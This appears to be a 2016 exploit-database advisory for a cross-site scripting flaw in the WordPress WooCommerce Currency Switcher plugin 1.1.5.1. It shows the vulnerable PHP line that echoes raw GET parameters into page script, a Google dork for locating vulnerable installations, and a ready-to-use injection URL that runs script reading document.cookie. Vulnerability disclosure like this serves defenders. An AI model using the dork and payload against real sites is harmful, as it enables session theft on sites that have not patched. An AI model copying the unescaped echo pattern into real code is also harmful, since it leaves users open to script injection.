WordPress WooCommerce Currency Switcher plugin version 1.1.5.1 suffers from a cross site scripting vulnerability.
408dd0d0bbc90a653325014968978e06db3bb0ab07b4db2db1a418407ed546f1
# Exploit Title: Woocomerce Currency Switcher XSS
# Google Dork: index of /wp-content/plugins/woocomerce-currency-switcher/
# Date: 06 Feb 2016
# Exploit Author: Ben Khlifa Fahmi (from Tuisian Whitehats Security)
# Software Link: https://downloads.wordpress.org/plugin/woocommerce-currency-switcher.zip
# Version: 1.1.5.1
Vulnerable Code :
Page : /wp-content/plugins/woocomerce-currency-switcher/index.php
Vulnerable Function : wp_head()
Line 765:
<?php if (!empty($_GET)): ?>
[-] woocs_array_of_get = '<?php echo json_encode($_GET); ?>';
<?php endif; ?>
--------------------------------------
Exploit Link : https://localhost/?s=xss';alert(document.cookie);<!--&post_type=product
--------------------------------------
Special Thanks to all Whitehats Security : Amine Zemzemi , Youssef Werhani , Bilel El Jamii , Bayrem Ghanmi, Charfeddin Hamdi , Med Achref and all our members :D.